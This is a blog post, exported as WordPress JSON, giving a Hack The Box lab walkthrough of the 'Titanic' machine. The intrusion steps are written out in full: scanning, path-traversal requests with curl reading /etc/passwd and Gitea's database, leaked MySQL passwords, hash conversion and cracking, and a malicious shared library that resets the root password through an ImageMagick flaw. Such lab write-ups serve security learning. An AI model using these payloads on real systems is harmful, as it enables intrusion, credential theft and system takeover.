{"id":221,"date":"2025-02-19T13:21:48","date_gmt":"2025-02-19T05:21:48","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=221"},"modified":"2026-01-29T16:16:16","modified_gmt":"2026-01-29T08:16:16","slug":"221","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/02\/19\/221\/","title":{"rendered":"HTB Machine Titanic Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1 id=\"hGUch\">Target Information<\/h1>\n<blockquote><p><strong>IP address: <\/strong><code><strong>10.10.11.55<\/strong><\/code><\/p><\/blockquote>\n<hr \/>\n<h1 id=\"rfJt9\">Information Gathering<\/h1>\n<h2 id=\"baomD\">ICMP Check<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.11.55 (10.10.11.55) 56(84) bytes of data.\n64 bytes from 10.10.11.55: icmp_seq=1 ttl=63 time=233 ms\n64 bytes from 10.10.11.55: icmp_seq=2 ttl=63 time=230 ms\n64 bytes from 10.10.11.55: icmp_seq=3 ttl=63 time=228 ms\n64 bytes from 10.10.11.55: icmp_seq=4 ttl=63 time=227 ms\n\n--- 10.10.11.55 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3001ms\nrtt min\/avg\/max\/mdev = 227.349\/229.478\/233.172\/2.347 ms<\/code><\/pre>\n<p>The target answers ICMP and network connectivity to the lab is good.<\/p>\n<h2 id=\"syFBg\">Firewall Check<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Tue Feb 18 19:54:52 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN .\/fin_report.txt 10.10.11.55\nWarning: 10.10.11.55 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.55\nHost is up (0.23s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE         SERVICE\n22\/tcp open|filtered ssh\n80\/tcp open|filtered http\n\n# Nmap done at Tue Feb 18 19:55:22 2025 -- 1 IP address (1 host up) scanned in 29.28 seconds<\/code><\/pre>\n<p>The FIN scan reports ports 22 and 80 as open|filtered, so the target appears to expose <code>SSH<\/code> and <code>HTTP<\/code> services.<\/p>\n<h2 
id=\"I6dpv\">Port Scanning<\/h2>\n<p><strong><code>TCP<\/code> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Tue Feb 18 19:57:47 2025 as: \/usr\/lib\/nmap\/nmap -sS -sV -A -p- --min-rate 3000 -oN .\/tcp_report.txt 10.10.11.55\nWarning: 10.10.11.55 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.55\nHost is up (0.23s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)\n|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.52\n|_http-title: Did not follow redirect to http:\/\/titanic.htb\/\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.19\nNetwork Distance: 2 hops\nService Info: Host: titanic.htb; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 8080\/tcp)\nHOP RTT       ADDRESS\n1   226.90 ms 10.10.14.1\n2   227.25 ms 10.10.11.55\n\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Tue Feb 18 19:58:35 2025 -- 1 IP address (1 host up) scanned in 48.01 seconds<\/code><\/pre>\n<p><strong><code>UDP<\/code> open-port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Tue Feb 18 19:59:10 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN .\/udp_ports.txt 10.10.11.55\nWarning: 10.10.11.55 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.55\nHost is up (0.25s latency).\nAll 65535 scanned ports on 10.10.11.55 are in ignored states.\nNot shown: 65298 open|filtered udp ports (no-response), 237 closed udp ports (port-unreach)\n\n# Nmap done at Tue Feb 18 20:03:12 2025 -- 1 IP address (1 host up) scanned in 242.37 seconds<\/code><\/pre>\n<p><strong><code>UDP<\/code> detailed service scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>The scans also show that the target runs <code>Ubuntu Linux<\/code>, exposes only <code>SSH<\/code> and an <code>HTTP<\/code> web service, and uses the domain name <code>titanic.htb<\/code> (the HTTP title shows a redirect to that name, so it needs an entry in <code>\/etc\/hosts<\/code> before browsing).<\/p>\n<hr \/>\n<h1 id=\"vSzOA\">Service Enumeration<\/h1>\n<h2 id=\"hcOFq\">SSH Service (Port 22)<\/h2>\n<p>Port <code>banner<\/code>:<\/p>\n<pre><code class=\"language-shell\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/titanic]\n\u2514\u2500# nc -nv 10.10.11.55 22\n(UNKNOWN) [10.10.11.55] 22 (ssh) open\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10<\/code><\/pre>\n<h2 id=\"pSigs\">Web Application (Port 80)<\/h2>\n<h3 
id=\"pSHsr\">Subdomain Enumeration<\/h3>\n<p>Use <code>wfuzz<\/code> to enumerate the site's subdomains through the <code>Host<\/code> header (<code>--hw 28<\/code> hides the default response by word count, <code>--hc 400<\/code> hides HTTP 400 responses):<\/p>\n<pre><code class=\"language-shell\">wfuzz -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -u 10.10.11.55 -H \"Host: FUZZ.titanic.htb\" -t 60 --hw 28 --hc 400<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739881938346-c5f87a3d-c774-4a7f-bc8d-f728ac96959a.png\" alt=\"\" \/><\/p>\n<p>The subdomain <code>dev.titanic.htb<\/code> was found.<\/p>\n<h3 id=\"l7hsM\">Main Site<\/h3>\n<p>Open the home page: <code>http:\/\/titanic.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739880880464-a3c820bf-1f3c-4502-9094-82d01c9b5b74.png\" alt=\"\" \/><\/p>\n<p>It looks like the customer-facing page of a travel booking system. Clicking the <code>Book Your Trip<\/code> button opens a personal-details registration form:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739880959090-a8ae24a9-1001-4f57-bdc0-74bbe3a2f13f.png\" alt=\"\" \/><\/p>\n<h3 id=\"ZSBa7\">Secondary Site (dev)<\/h3>\n<p>Open the URL: <code>http:\/\/dev.titanic.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739921323562-6e79dd37-5ffa-4c92-a97a-6f08e3349f66.png\" alt=\"\" \/><\/p>\n<p>A <code>Gitea<\/code> source-code hosting instance is deployed here, version <code>v1.22.1<\/code>; no vulnerability was found in it.<\/p>\n<p>Clicking the Explore button reveals two public repositories: <code>flask-app<\/code> and <code>docker-config<\/code>.<\/p>\n<p><img 
decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739922425310-03db8122-dd81-4029-bc1e-6c418bbd9e79.png\" alt=\"\" \/><\/p>\n<p>The <code>docker-config<\/code> repository contains sensitive files: <code>.\/gitea\/docker-compose.yml<\/code> and <code>.\/mysql\/docker-compose.yml<\/code>, with the following contents:<\/p>\n<pre><code class=\"language-yaml\"># .\/gitea\/docker-compose.yml\nversion: '3'\n\nservices:\n  gitea:\n    image: gitea\/gitea\n    container_name: gitea\n    ports:\n      - \"127.0.0.1:3000:3000\"\n      - \"127.0.0.1:2222:22\"  # Optional for SSH access\n    volumes:\n      - \/home\/developer\/gitea\/data:\/data # Replace with your path\n    environment:\n      - USER_UID=1000\n      - USER_GID=1000\n    restart: always<\/code><\/pre>\n<pre><code class=\"language-yaml\"># .\/mysql\/docker-compose.yml\nversion: '3.8'\n\nservices:\n  mysql:\n    image: mysql:8.0\n    container_name: mysql\n    ports:\n      - \"127.0.0.1:3306:3306\"\n    environment:\n      MYSQL_ROOT_PASSWORD: 'MySQLP@$w0rd!'\n      MYSQL_DATABASE: tickets \n      MYSQL_USER: sql_svc\n      MYSQL_PASSWORD: sql_password\n    restart: always<\/code><\/pre>\n<p>Probable <code>MySQL<\/code> credentials found:<\/p>\n<ul>\n<li>Host: local (bound to <code>127.0.0.1<\/code> only)<\/li>\n<li>Port: <code>3306<\/code><\/li>\n<li>Database: <code>tickets<\/code><\/li>\n<li>Username: <code>root<\/code>, password: <code>MySQLP@$$w0rd!<\/code><\/li>\n<li>Username: <code>sql_svc<\/code>, password: <code>sql_password<\/code><\/li>\n<\/ul>\n<p>as well as the absolute path of the <code>Gitea<\/code> data directory on the host: <code>\/home\/developer\/gitea\/data<\/code><\/p>\n<p>Inspecting the <code>flask-app<\/code> repository reveals the source code of the main site's <code>Python Flask<\/code> application:<\/p>\n<pre><code class=\"language-python\">from flask import Flask, request, jsonify, send_file, render_template, redirect, url_for, Response\nimport os\nimport json\nfrom uuid import uuid4\n\napp = Flask(__name__)\n\nTICKETS_DIR = \"tickets\"\n\nif not os.path.exists(TICKETS_DIR):\n    os.makedirs(TICKETS_DIR)\n\n@app.route('\/')\ndef index():\n    return render_template('index.html')\n\n@app.route('\/book', methods=['POST'])\ndef book_ticket():\n    data = {\n        \"name\": request.form['name'],\n        \"email\": request.form['email'],\n        \"phone\": request.form['phone'],\n        \"date\": request.form['date'],\n        \"cabin\": request.form['cabin']\n    }\n\n    ticket_id = str(uuid4())\n    json_filename = f\"{ticket_id}.json\"\n    json_filepath = os.path.join(TICKETS_DIR, json_filename)\n\n    with open(json_filepath, 'w') as json_file:\n        json.dump(data, json_file)\n\n    return redirect(url_for('download_ticket', ticket=json_filename))\n\n@app.route('\/download', methods=['GET'])\ndef download_ticket():\n    ticket = request.args.get('ticket')\n    if not ticket:\n        return jsonify({\"error\": \"Ticket parameter is required\"}), 400\n\n    json_filepath = os.path.join(TICKETS_DIR, ticket)  # user-controlled, never validated\n\n    if os.path.exists(json_filepath):\n        return send_file(json_filepath, as_attachment=True, download_name=ticket)\n    else:\n        return jsonify({\"error\": \"Ticket not found\"}), 404\n\nif __name__ == '__main__':\n    app.run(host='127.0.0.1', 
port=5000)<\/code><\/pre>\n<p>The <code>download_ticket()<\/code> function in this source (line <code>45<\/code>) has an arbitrary file read vulnerability. The program joins the <code>ticket<\/code> value received from the <code>GET<\/code> request directly onto the relative directory <code>tickets<\/code> without filtering the path separator <code>\/<\/code>; because <code>os.path.join<\/code> discards the first component when the second is an absolute path, and <code>..<\/code> sequences are not rejected either, any file readable by the service account can be requested.<\/p>\n<hr \/>\n<h1 id=\"KqRmt\">Penetration Testing<\/h1>\n<h2 id=\"YsXov\">Exploiting the Arbitrary File Read<\/h2>\n<p>On the main site, request the <code>\/download<\/code> endpoint with a traversal path to <code>\/etc\/passwd<\/code> in the <code>ticket<\/code> parameter: <code>http:\/\/titanic.htb\/download?ticket=\/..\/..\/..\/..\/..\/etc\/passwd<\/code><\/p>\n<pre><code class=\"language-shell\">curl \"http:\/\/titanic.htb\/download?ticket=\/..\/..\/..\/..\/..\/etc\/passwd\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739923322248-0d5a48cc-4506-4237-9dbc-626252685eab.png\" alt=\"\" \/><\/p>\n<p><strong>Success!<\/strong> The system has a <code>developer<\/code> user.<\/p>\n<p>Using the <code>Gitea<\/code> data directory path found earlier, try to read Gitea's configuration file <code>app.ini<\/code>:<\/p>\n<pre><code class=\"language-shell\">curl \"http:\/\/titanic.htb\/download?ticket=\/..\/..\/..\/..\/..\/home\/developer\/gitea\/data\/gitea\/conf\/app.ini\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739923497168-bcbbaf80-ef1d-49a6-b19c-376cfede1b24.png\" alt=\"\" 
\/><\/p>\n<p>The configuration file is readable and reveals the <code>SQLite<\/code> database path: <code>\/home\/developer\/gitea\/data\/gitea\/gitea.db<\/code>. Download it directly:<\/p>\n<pre><code class=\"language-shell\">wget \"http:\/\/titanic.htb\/download?ticket=\/..\/..\/..\/..\/..\/home\/developer\/gitea\/data\/gitea\/gitea.db\" -O .\/gitea.db<\/code><\/pre>\n<p>Open it with <code>sqlitebrowser<\/code> and look at the <code>user<\/code> table:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739924547536-061671df-9912-474d-95b5-e903c7dd3044.png\" alt=\"\" \/><\/p>\n<p>User passwords are hashed with <code>PBKDF2-HMAC-SHA256<\/code>, <code>50000<\/code> iterations, with a per-user salt. Convert the hashes of the <code>administrator<\/code>, <code>developer<\/code> and <code>testing<\/code> users into a format <code>hashcat<\/code> accepts and crack them. The conversion script:<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\n# Gitea stores the PBKDF2 digest and salt as hex strings in the user table;\n# hashcat mode 10900 expects sha256:&lt;iterations&gt;:&lt;base64 salt&gt;:&lt;base64 digest&gt;\nimport base64\nadmin_hash = base64.b64encode(bytes.fromhex(\"cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136\")).decode(\"utf-8\")\nadmin_salt = base64.b64encode(bytes.fromhex(\"2d149e5fbd1b20cf31db3e3c6a28fc9b\")).decode(\"utf-8\")\ndeveloper_hash = base64.b64encode(bytes.fromhex(\"e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56\")).decode(\"utf-8\")\ndeveloper_salt = base64.b64encode(bytes.fromhex(\"8bf3e3452b78544f8bee9400d6936d34\")).decode(\"utf-8\")\ntesting_hash = 
base64.b64encode(bytes.fromhex(\"b2c86971b51a09f68320a677b9b9fb35e9a43e4cb6b620114fbce185c85d243a213c94b4f524434ffc73c6851662ff76ca83\")).decode(\"utf-8\")\ntesting_salt = base64.b64encode(bytes.fromhex(\"2ab303b548c0df7d7df228daa3e1662e\")).decode(\"utf-8\")\nprint(\"sha256:50000:%s:%s\"%(admin_salt,admin_hash))\nprint(\"sha256:50000:%s:%s\"%(developer_salt,developer_hash))\nprint(\"sha256:50000:%s:%s\"%(testing_salt,testing_hash))<\/code><\/pre>\n<p>Then save the script output to a file:<\/p>\n<pre><code class=\"language-shell\">.\/converthash.py &gt; gitea_hash.txt<\/code><\/pre>\n<p>Then crack with <code>hashcat<\/code> (mode <code>10900<\/code> is PBKDF2-HMAC-SHA256) against the rockyou wordlist:<\/p>\n<pre><code class=\"language-powershell\">.\\hashcat.exe -m 10900 -a 0 Z:\\titanic\\gitea_hash.txt .\\rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739926417919-844b7481-91d1-45a3-b780-0bbbbacc8c68.png\" alt=\"\" \/><\/p>\n<p>Credentials recovered:<\/p>\n<ul>\n<li>Username: <code>developer<\/code><\/li>\n<li>Password: <code>25282528<\/code><\/li>\n<\/ul>\n<p>Log in over <code>SSH<\/code> with them:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739926721116-1735f4d7-d512-44d6-89cb-d94ebc9c6de8.png\" alt=\"\" \/><\/p>\n<p><strong>Success!!<\/strong><\/p>\n<hr \/>\n<h1 id=\"L59tS\">Privilege Escalation<\/h1>\n<h2 id=\"tW9FO\">Directory Enumeration<\/h2>\n<p>After logging in, a suspicious script <code>\/opt\/scripts\/identify_images.sh<\/code> was found with the following contents:<\/p>\n<pre><code class=\"language-shell\">cd \/opt\/app\/static\/assets\/images\ntruncate -s 0 metadata.log\nfind \/opt\/app\/static\/assets\/images\/ -type f -name \"*.jpg\" | xargs \/usr\/bin\/magick identify &gt;&gt; 
metadata.log<\/code><\/pre>\n<p>Nothing else suspicious was found.<\/p>\n<h2 id=\"cLFnL\">Privilege Escalation via the ImageMagick Vulnerability<\/h2>\n<p>During directory enumeration, the suspicious script <code>\/opt\/scripts\/identify_images.sh<\/code> was found; its third line invokes the <code>\/usr\/bin\/magick<\/code> binary. Inspect that binary:<\/p>\n<pre><code class=\"language-shell\">ls -lA \/usr\/bin\/magick\nmagick -version<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739940837704-9fa2250b-74bd-4bf7-aa35-80ab8cca9e84.png\" alt=\"\" \/><\/p>\n<p>The binary is the <code>ImageMagick<\/code> image-processing suite, version <code>v7.1.1-35<\/code>; <code>identify_images.sh<\/code> is suspected to be run on a schedule (a cron job).<\/p>\n<p>Searching online for vulnerabilities in this <code>ImageMagick<\/code> version turns up an arbitrary code execution advisory: <a href=\"https:\/\/github.com\/ImageMagick\/ImageMagick\/security\/advisories\/GHSA-8rxc-922v-phg8\" target=\"_blank\"  rel=\"nofollow\" >Arbitrary Code Execution in AppImage version ImageMagick \u00b7 Advisory \u00b7 ImageMagick\/ImageMagick<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739941040471-55f034cc-e668-4116-8626-3c2f7b0ce9a1.png\" alt=\"\" \/><\/p>\n<p>Following the advisory (the AppImage build searches its current working directory for shared libraries), compile a malicious shared library <code>libxcb.so.1<\/code> directly in the script's working directory <code>\/opt\/app\/static\/assets\/images<\/code>:<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include 
&lt;unistd.h&gt;\n\n\/\/ constructor: runs as soon as the library is loaded by the scheduled magick run\n__attribute__((constructor)) void init(){\n    system(\"id &gt; .\/id.txt\");\n    system(\"echo 'root:*********' | chpasswd\");\n    exit(0);\n}<\/code><\/pre>\n<pre><code class=\"language-shell\">gcc -x c -shared -fPIC -o .\/libxcb.so.1 .\/libxcb-evil.c<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739941403985-e339bed4-7de2-4122-945f-fc7a7db59a86.png\" alt=\"\" \/><\/p>\n<p>After waiting a while, try switching to the <code>root<\/code> user:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1739941509655-9903aa2a-f100-4b8a-abd8-8df29f64837a.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation succeeded!!!!<\/strong><\/p>\n<hr \/>\n<h1 id=\"hHxyD\">This Machine's Penetration Test Ends Here<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.10.11.55 Information Gathering ICMP Check PING 10.10.11.55 (10.10.11.55)  
&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-221","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"]}